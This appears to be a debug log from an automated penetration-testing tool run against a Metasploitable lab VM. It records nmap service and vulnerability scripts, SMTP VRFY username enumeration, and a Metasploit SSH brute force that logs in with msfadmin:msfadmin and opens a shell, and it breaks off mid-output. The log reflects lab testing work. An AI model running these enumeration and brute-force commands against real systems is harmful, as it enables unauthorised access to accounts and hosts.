2016-10-13 20:05:30,552 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_6  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:05:30,553 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_6  Message --> :Thread started --with command nslookup 192.168.179.136
2016-10-13 20:05:30,728 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_6  Message --> :Thread finished
2016-10-13 20:05:30,730 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_6  Message --> :Saving details :
2016-10-13 20:05:30,732 - Commands Logger - DEBUG - Command id is ->domain_6
2016-10-13 20:05:30,732 - Commands Logger - DEBUG - commands are : [u'nslookup 192.168.179.136', '\nEnd']
2016-10-13 20:05:30,733 - Commands Logger - DEBUG - My var : '$.Entries."domain_6"'
2016-10-13 20:05:30,733 - Commands Logger - DEBUG - Result --> : Command Executed :nslookup 192.168.179.136

ResultServer:		192.168.179.2
Address:	192.168.179.2#53

** server can't find 136.179.168.192.in-addr.arpa: NXDOMAIN




2016-10-13 20:05:30,739 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:05:30,780 - Commands Logger - DEBUG - Command Logger --->Command id --> telnet_1  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:05:30,781 - Commands Logger - DEBUG - Command Logger --->Command id --> telnet_1  Message --> :Thread started --with command nmap -p 23 192.168.179.136 --script telnet-encryption
2016-10-13 20:05:39,434 - Commands Logger - DEBUG - Command Logger --->Command id --> telnet_1  Message --> :Thread finished
2016-10-13 20:05:39,435 - Commands Logger - DEBUG - Command Logger --->Command id --> telnet_1  Message --> :Saving details :
2016-10-13 20:05:39,436 - Commands Logger - DEBUG - Command id is ->telnet_1
2016-10-13 20:05:39,436 - Commands Logger - DEBUG - commands are : [u'nmap -p 23 192.168.179.136 --script telnet-encryption', '\nEnd']
2016-10-13 20:05:39,436 - Commands Logger - DEBUG - My var : '$.Entries."telnet_1"'
2016-10-13 20:05:39,437 - Commands Logger - DEBUG - Result --> : Command Executed :nmap -p 23 192.168.179.136 --script telnet-encryption

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:05 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00061s latency).
PORT   STATE SERVICE
23/tcp open  telnet
| telnet-encryption: 
|_  ERROR: Receiving packet: TIMEOUT
MAC Address: 00:0C:29:25:59:EA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.63 seconds



2016-10-13 20:05:39,440 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:05:39,459 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_1  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:05:39,459 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_1  Message --> :Thread started --with command python Scripts/smtp-vrfy-check.py -h 192.168.179.136 -p 25 -u Scripts/names.txt -v 0
2016-10-13 20:05:46,957 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_1  Message --> :Thread finished
2016-10-13 20:05:46,958 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_1  Message --> :Saving details :
2016-10-13 20:05:46,964 - Commands Logger - DEBUG - Command id is ->smtp_1
2016-10-13 20:05:46,964 - Commands Logger - DEBUG - commands are : [u'python Scripts/smtp-vrfy-check.py -h 192.168.179.136 -p 25 -u Scripts/names.txt -v 0', '\nEnd']
2016-10-13 20:05:46,964 - Commands Logger - DEBUG - My var : '$.Entries."smtp_1"'
2016-10-13 20:05:46,964 - Commands Logger - DEBUG - Result --> : Command Executed :python Scripts/smtp-vrfy-check.py -h 192.168.179.136 -p 25 -u Scripts/names.txt -v 0

ResultSMTP VRFY Checker
By brad a.
---------------------------------
[+] Establishing connection to 192.168.179.136 : 25
[V] Banner:
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

[V] Sending: VRFY jame

[+] User: jame  -> Not Found!
550 5.1.1 <jame>: Recipient address rejected: User unknown in local recipient table

[V] Sending: VRFY jill

[+] User: jill  -> Not Found!
550 5.1.1 <jill>: Recipient address rejected: User unknown in local recipient table

[V] Sending: VRFY khan

[+] User: khan  -> Not Found!
550 5.1.1 <khan>: Recipient address rejected: User unknown in local recipient table

[V] Sending: VRFY root

[+] User: root  -> Unknown Error!
252 2.0.0 root

[V] Sending: VRFY toor

[+] User: toor  -> Not Found!
550 5.1.1 <toor>: Recipient address rejected: User unknown in local recipient table

[V] Sending: VRFY admin

[+] User: admin  -> Not Found!
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table

[V] Sending: VRFY msfadmin

[+] User: msfadmin  -> Unknown Error!
252 2.0.0 msfadmin

[V] Sending: VRFY msf

[+] User: msf  -> Not Found!
550 5.1.1 <msf>: Recipient address rejected: User unknown in local recipient table

[V] Sending: VRFY admin@123

[+] User: admin@123  -> Unknown Error!
501 5.1.3 Bad recipient address syntax

[V] Attempted ten usernames, reconnecting
[V] Banner:
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

[V] Sending: VRFY abc

[+] User: abc  -> Unknown Error!
252 2.0.0 abc

[V] Sending: VRFY furqan

[+] User: furqan  -> Not Found!
550 5.1.1 <furqan>: Recipient address rejected: User unknown in local recipient table

[V] Sending: VRFY pal-blr-furqan

[+] User: pal-blr-furqan  -> Not Found!
550 5.1.1 <pal-blr-furqan>: Recipient address rejected: User unknown in local recipient table




2016-10-13 20:05:46,971 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:05:47,009 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_2  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:05:47,015 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_2  Message --> :Thread started --with command python Scripts/smtp-vrfy.py -t 192.168.179.136 -p 25 -f Scripts/names.txt
2016-10-13 20:05:47,301 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_2  Message --> :Thread finished
2016-10-13 20:05:47,302 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_2  Message --> :Saving details :
2016-10-13 20:05:47,303 - Commands Logger - DEBUG - Command id is ->smtp_2
2016-10-13 20:05:47,304 - Commands Logger - DEBUG - commands are : [u'python Scripts/smtp-vrfy.py -t 192.168.179.136 -p 25 -f Scripts/names.txt', '\nEnd']
2016-10-13 20:05:47,304 - Commands Logger - DEBUG - My var : '$.Entries."smtp_2"'
2016-10-13 20:05:47,304 - Commands Logger - DEBUG - Result --> : Command Executed :python Scripts/smtp-vrfy.py -t 192.168.179.136 -p 25 -f Scripts/names.txt

Result[+] Connecting to server
[+] Connected onThu Oct 13 20:05:47 2016
[+] Waiting for SMTP banner
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

[-] Not found jill

[-] Not found khan

[+] Found! root

[-] Not found toor

[-] Not found admin

[+] Found! msfadmin

[-] Not found msf

[+] Found! abc

[-] Not found furqan

[-] Not found pal-blr-furqan




2016-10-13 20:05:47,308 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:05:47,346 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_3  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:05:47,351 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_3  Message --> :Thread started --with command nmap -sV --script=banner.nse -p 25 192.168.179.136
2016-10-13 20:05:49,515 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_3  Message --> :Thread finished
2016-10-13 20:05:49,515 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_3  Message --> :Saving details :
2016-10-13 20:05:49,516 - Commands Logger - DEBUG - Command id is ->smtp_3
2016-10-13 20:05:49,517 - Commands Logger - DEBUG - commands are : [u'nmap -sV --script=banner.nse -p 25 192.168.179.136', '\nEnd']
2016-10-13 20:05:49,517 - Commands Logger - DEBUG - My var : '$.Entries."smtp_3"'
2016-10-13 20:05:49,517 - Commands Logger - DEBUG - Result --> : Command Executed :nmap -sV --script=banner.nse -p 25 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:05 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00031s latency).
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
MAC Address: 00:0C:29:25:59:EA (VMware)
Service Info: Host:  metasploitable.localdomain

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds



2016-10-13 20:05:49,523 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:05:49,546 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_4  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:05:49,559 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_4  Message --> :Thread started --with command nmap --script=smtp-open-relay.nse -p 25 192.168.179.136
2016-10-13 20:06:09,188 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_4  Message --> :Thread finished
2016-10-13 20:06:09,189 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_4  Message --> :Saving details :
2016-10-13 20:06:09,190 - Commands Logger - DEBUG - Command id is ->smtp_4
2016-10-13 20:06:09,190 - Commands Logger - DEBUG - commands are : [u'nmap --script=smtp-open-relay.nse -p 25 192.168.179.136', '\nEnd']
2016-10-13 20:06:09,190 - Commands Logger - DEBUG - My var : '$.Entries."smtp_4"'
2016-10-13 20:06:09,191 - Commands Logger - DEBUG - Result --> : Command Executed :nmap --script=smtp-open-relay.nse -p 25 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:05 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00056s latency).
PORT   STATE SERVICE
25/tcp open  smtp
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
MAC Address: 00:0C:29:25:59:EA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 19.61 seconds



2016-10-13 20:06:09,195 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:06:09,232 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_5  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:06:09,240 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_5  Message --> :Thread started --with command nmap --script=smtp-enum-users.nse -p 25 192.168.179.136
2016-10-13 20:06:10,866 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_5  Message --> :Thread finished
2016-10-13 20:06:10,867 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_5  Message --> :Saving details :
2016-10-13 20:06:10,868 - Commands Logger - DEBUG - Command id is ->smtp_5
2016-10-13 20:06:10,869 - Commands Logger - DEBUG - commands are : [u'nmap --script=smtp-enum-users.nse -p 25 192.168.179.136', '\nEnd']
2016-10-13 20:06:10,869 - Commands Logger - DEBUG - My var : '$.Entries."smtp_5"'
2016-10-13 20:06:10,869 - Commands Logger - DEBUG - Result --> : Command Executed :nmap --script=smtp-enum-users.nse -p 25 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:06 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00056s latency).
PORT   STATE SERVICE
25/tcp open  smtp
| smtp-enum-users: 
|_  Method RCPT returned a unhandled status code.
MAC Address: 00:0C:29:25:59:EA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds



2016-10-13 20:06:10,874 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:06:10,897 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_6  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:06:10,904 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_6  Message --> :Thread started --with command nmap --script=ssl-heartbleed.nse -p 25 192.168.179.136
2016-10-13 20:06:12,446 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_6  Message --> :Thread finished
2016-10-13 20:06:12,446 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_6  Message --> :Saving details :
2016-10-13 20:06:12,447 - Commands Logger - DEBUG - Command id is ->smtp_6
2016-10-13 20:06:12,447 - Commands Logger - DEBUG - commands are : [u'nmap --script=ssl-heartbleed.nse -p 25 192.168.179.136', '\nEnd']
2016-10-13 20:06:12,448 - Commands Logger - DEBUG - My var : '$.Entries."smtp_6"'
2016-10-13 20:06:12,448 - Commands Logger - DEBUG - Result --> : Command Executed :nmap --script=ssl-heartbleed.nse -p 25 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:06 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00083s latency).
PORT   STATE SERVICE
25/tcp open  smtp
MAC Address: 00:0C:29:25:59:EA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.51 seconds



2016-10-13 20:06:12,452 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:06:12,463 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_7  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:06:12,468 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_7  Message --> :Thread started --with command nmap --script=smtp-strangeport.nse -p 25 192.168.179.136
2016-10-13 20:06:13,802 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_7  Message --> :Thread finished
2016-10-13 20:06:13,803 - Commands Logger - DEBUG - Command Logger --->Command id --> smtp_7  Message --> :Saving details :
2016-10-13 20:06:13,804 - Commands Logger - DEBUG - Command id is ->smtp_7
2016-10-13 20:06:13,804 - Commands Logger - DEBUG - commands are : [u'nmap --script=smtp-strangeport.nse -p 25 192.168.179.136', '\nEnd']
2016-10-13 20:06:13,804 - Commands Logger - DEBUG - My var : '$.Entries."smtp_7"'
2016-10-13 20:06:13,805 - Commands Logger - DEBUG - Result --> : Command Executed :nmap --script=smtp-strangeport.nse -p 25 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:06 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00031s latency).
PORT   STATE SERVICE
25/tcp open  smtp
MAC Address: 00:0C:29:25:59:EA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds



2016-10-13 20:06:13,808 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:06:13,828 - Commands Logger - DEBUG - Command Logger --->Command id --> telnet_1  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:06:13,837 - Commands Logger - DEBUG - Command Logger --->Command id --> telnet_1  Message --> :Thread started --with command nmap -p 23 192.168.179.136 --script telnet-encryption
2016-10-13 20:06:15,359 - Commands Logger - DEBUG - Command Logger --->Command id --> telnet_1  Message --> :Thread finished
2016-10-13 20:06:15,360 - Commands Logger - DEBUG - Command Logger --->Command id --> telnet_1  Message --> :Saving details :
2016-10-13 20:06:15,361 - Commands Logger - DEBUG - Command id is ->telnet_1
2016-10-13 20:06:15,361 - Commands Logger - DEBUG - commands are : [u'nmap -p 23 192.168.179.136 --script telnet-encryption', '\nEnd']
2016-10-13 20:06:15,361 - Commands Logger - DEBUG - My var : '$.Entries."telnet_1"'
2016-10-13 20:06:15,361 - Commands Logger - DEBUG - Result --> : Command Executed :nmap -p 23 192.168.179.136 --script telnet-encryption

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:06 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00093s latency).
PORT   STATE SERVICE
23/tcp open  telnet
| telnet-encryption: 
|_  Telnet server does not support encryption
MAC Address: 00:0C:29:25:59:EA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds



2016-10-13 20:06:15,366 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:06:15,379 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :Inside command_meta
2016-10-13 20:06:26,191 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :[4mmsf[0m [0m> 
2016-10-13 20:06:26,191 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :0
2016-10-13 20:06:29,297 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :workspace -a Metasploit_automation
[0m[1m[34m[*][0m Added workspace: Metasploit_automation
[4mmsf[0m [0m> 
2016-10-13 20:06:32,407 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :set THREADS 1
[0mTHREADS => 1
[4mmsf[0m [0m> 
2016-10-13 20:06:35,519 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :workspace Metasploit_automation
[0m[1m[34m[*][0m Workspace: Metasploit_automation
[4mmsf[0m [0m> 
2016-10-13 20:06:38,632 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :use auxiliary/scanner/ssh/ssh_login
[0m[4mmsf[0m auxiliary([1m[31mssh_login[0m) [0m> 
2016-10-13 20:06:41,738 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :set RHOSTS 192.168.179.136
[0mRHOSTS => 192.168.179.136
[4mmsf[0m auxiliary([1m[31mssh_login[0m) [0m> 
2016-10-13 20:06:44,844 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :set USERPASS_FILE /usr/share/metasploit-framework/dat a/wordlists/root_userpass.txt
[0mUSERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
[4mmsf[0m auxiliary([1m[31mssh_login[0m) [0m> 
2016-10-13 20:06:47,953 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :set VERBOSE false
[0mVERBOSE => false
[4mmsf[0m auxiliary([1m[31mssh_login[0m) [0m> 
2016-10-13 20:06:47,953 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :

Everything Fine till now-->Launching run command


2016-10-13 20:08:51,550 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :

Module Execution completed


2016-10-13 20:08:51,551 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :Before : 
After : 
run
[0m
[1m[34m[*][0m 192.168.179.136:22 SSH - Starting bruteforce
[1m[32m[+][0m 192.168.179.136:22 SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[1m[34m[*][0m Command shell session 1 opened (192.168.179.139:43293 -> 192.168.179.136:22) at 2016-10-13 20:08:49 -0400
2016-10-13 20:08:51,552 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :

Now exiting !!!


2016-10-13 20:08:51,552 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :
Exiting  from msfconsole !!!

2016-10-13 20:09:53,712 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :

Some Error Occured while Exiting


2016-10-13 20:09:53,713 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :Before : 

[1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
[1m[34m[*][0m Auxiliary module execution completed
[4mmsf[0m auxiliary([1m[31mssh_login[0m) [0m> exit
[0m[1m[34m[*][0m You have active sessions open, to exit anyway type "exit -y"
[4mmsf[0m auxiliary([1m[31mssh_login[0m) [0m> After : 
<class 'pexpect.TIMEOUT'>
2016-10-13 20:09:53,713 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :Closing the child pipe !!!
2016-10-13 20:09:54,019 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_1  Message --> :Saving details :
2016-10-13 20:09:54,021 - Commands Logger - DEBUG - Command id is ->ssh_1
2016-10-13 20:09:54,021 - Commands Logger - DEBUG - commands are : ['>msfconsole', '\x1b[4mmsf\x1b[0m \x1b[0m> ', u'workspace -a Metasploit_automation\n', 'workspace -a Metasploit_automation\r\r\n\x1b[0m\x1b[1m\x1b[34m[*]\x1b[0m Added workspace: Metasploit_automation\r\n\x1b[4mmsf\x1b[0m \x1b[0m> \n', u'set THREADS 1\n', 'set THREADS 1\r\r\n\x1b[0mTHREADS => 1\r\n\x1b[4mmsf\x1b[0m \x1b[0m> \n', u'workspace Metasploit_automation\n', 'workspace Metasploit_automation\r\r\n\x1b[0m\x1b[1m\x1b[34m[*]\x1b[0m Workspace: Metasploit_automation\r\n\x1b[4mmsf\x1b[0m \x1b[0m> \n', u'use auxiliary/scanner/ssh/ssh_login\n', 'use auxiliary/scanner/ssh/ssh_login\r\r\n\x1b[0m\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31mssh_login\x1b[0m) \x1b[0m> \n', u'set RHOSTS 192.168.179.136\n', 'set RHOSTS 192.168.179.136\r\r\n\x1b[0mRHOSTS => 192.168.179.136\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31mssh_login\x1b[0m) \x1b[0m> \n', u'set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt\n', 'set USERPASS_FILE /usr/share/metasploit-framework/dat \ra/wordlists/root_userpass.txt\r\r\n\x1b[0mUSERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31mssh_login\x1b[0m) \x1b[0m> \n', u'set VERBOSE false\n', 'set VERBOSE false\r\r\n\x1b[0mVERBOSE => false\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31mssh_login\x1b[0m) \x1b[0m> \n', '>run', "run\r\r\n\x1b[0m\r\n\x1b[1m\x1b[34m[*]\x1b[0m 192.168.179.136:22 SSH - Starting bruteforce\r\n\x1b[1m\x1b[32m[+]\x1b[0m 192.168.179.136:22 SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '\r\n\x1b[1m\x1b[34m[*]\x1b[0m Command shell session 1 opened (192.168.179.139:43293 -> 192.168.179.136:22) at 2016-10-13 20:08:49 -0400\n"]
2016-10-13 20:09:54,021 - Commands Logger - DEBUG - My var : '$.Entries."ssh_1"'
2016-10-13 20:09:54,022 - Commands Logger - DEBUG - Result --> : 
Command Executed :>msfconsole
Result :
run
[0m
[1m[34m[*][0m 192.168.179.136:22 SSH - Starting bruteforce
[1m[32m[+][0m 192.168.179.136:22 SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[1m[34m[*][0m Command shell session 1 opened (192.168.179.139:43293 -> 192.168.179.136:22) at 2016-10-13 20:08:49 -0400
2016-10-13 20:09:54,034 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:09:54,035 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_2  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:09:54,035 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_2  Message --> :Thread started --with command java -cp Scripts/'ssh-cipher-check.jar' SSHCipherCheck 192.168.179.136 22
2016-10-13 20:09:57,776 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_2  Message --> :Thread finished
2016-10-13 20:09:57,776 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_2  Message --> :Saving details :
2016-10-13 20:09:57,778 - Commands Logger - DEBUG - Command id is ->ssh_2
2016-10-13 20:09:57,778 - Commands Logger - DEBUG - commands are : [u"java -cp Scripts/'ssh-cipher-check.jar' SSHCipherCheck 192.168.179.136 22", '\nEnd']
2016-10-13 20:09:57,779 - Commands Logger - DEBUG - My var : '$.Entries."ssh_2"'
2016-10-13 20:09:57,779 - Commands Logger - DEBUG - Result --> : Command Executed :java -cp Scripts/'ssh-cipher-check.jar' SSHCipherCheck 192.168.179.136 22

ResultSSH Version: 2.0
SSH Library: OpenSSH_4.7p1 Debian


Key Exchange Algorithms: diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
Server Host Key Algorithms: ssh-rsa,ssh-dss
Encryption Algorithms Client to Server: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr
Encryption Algorithms Server to Client: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr
Mac Algorithms Client to Server: hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
Mac Algorithms Server to Client: hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
Compression Algorithms Client to Server: none,zlib@openssh.com
Compression Algorithms Server to Client: none,zlib@openssh.com



2016-10-13 20:09:57,783 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:09:57,824 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_3  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:09:57,825 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_3  Message --> :Thread started --with command nc -zvn 192.168.179.136 22
2016-10-13 20:09:57,861 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_3  Message --> :Thread finished
2016-10-13 20:09:57,862 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_3  Message --> :Saving details :
2016-10-13 20:09:57,863 - Commands Logger - DEBUG - Command id is ->ssh_3
2016-10-13 20:09:57,863 - Commands Logger - DEBUG - commands are : [u'nc -zvn 192.168.179.136 22', '\nEnd']
2016-10-13 20:09:57,864 - Commands Logger - DEBUG - My var : '$.Entries."ssh_3"'
2016-10-13 20:09:57,864 - Commands Logger - DEBUG - Result --> : Command Executed :nc -zvn 192.168.179.136 22

Result
(UNKNOWN) [192.168.179.136] 22 (ssh) open


2016-10-13 20:09:57,868 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:09:57,896 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_4  Message --> :

Starting ssh--INteractive


2016-10-13 20:10:02,902 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_4  Message --> :Permission Denied at inception for root--Good 
2016-10-13 20:10:02,902 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_4  Message --> :Before : 
After : 

Permission denied, please try again.
root@192.168.179.136's password: 
2016-10-13 20:10:02,903 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_4  Message --> :Closing Child now !!
2016-10-13 20:10:03,005 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_4  Message --> :Saving details :
2016-10-13 20:10:03,007 - Commands Logger - DEBUG - Command id is ->ssh_4
2016-10-13 20:10:03,007 - Commands Logger - DEBUG - commands are : [u'ssh root@192.168.179.136\n', 'root\n', "\r\nPermission denied, please try again.\r\r\nroot@192.168.179.136's password: \n"]
2016-10-13 20:10:03,008 - Commands Logger - DEBUG - My var : '$.Entries."ssh_4"'
2016-10-13 20:10:03,008 - Commands Logger - DEBUG - Result --> : Command Executed :ssh root@192.168.179.136


Result:

Permission denied, please try again.
root@192.168.179.136's password: 

2016-10-13 20:10:03,012 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:10:03,015 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_5  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:10:03,022 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_5  Message --> :Thread started --with command nmap -sV --script=ssh2-enum-algos.nse -p 22 192.168.179.136
2016-10-13 20:10:04,901 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_5  Message --> :Thread finished
2016-10-13 20:10:04,902 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_5  Message --> :Saving details :
2016-10-13 20:10:04,903 - Commands Logger - DEBUG - Command id is ->ssh_5
2016-10-13 20:10:04,903 - Commands Logger - DEBUG - commands are : [u'nmap -sV --script=ssh2-enum-algos.nse -p 22 192.168.179.136', '\nEnd']
2016-10-13 20:10:04,903 - Commands Logger - DEBUG - My var : '$.Entries."ssh_5"'
2016-10-13 20:10:04,904 - Commands Logger - DEBUG - Result --> : Command Executed :nmap -sV --script=ssh2-enum-algos.nse -p 22 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:10 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00032s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh2-enum-algos: 
|   kex_algorithms: (4)
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group-exchange-sha1
|       diffie-hellman-group14-sha1
|       diffie-hellman-group1-sha1
|   server_host_key_algorithms: (2)
|       ssh-rsa
|       ssh-dss
|   encryption_algorithms: (13)
|       aes128-cbc
|       3des-cbc
|       blowfish-cbc
|       cast128-cbc
|       arcfour128
|       arcfour256
|       arcfour
|       aes192-cbc
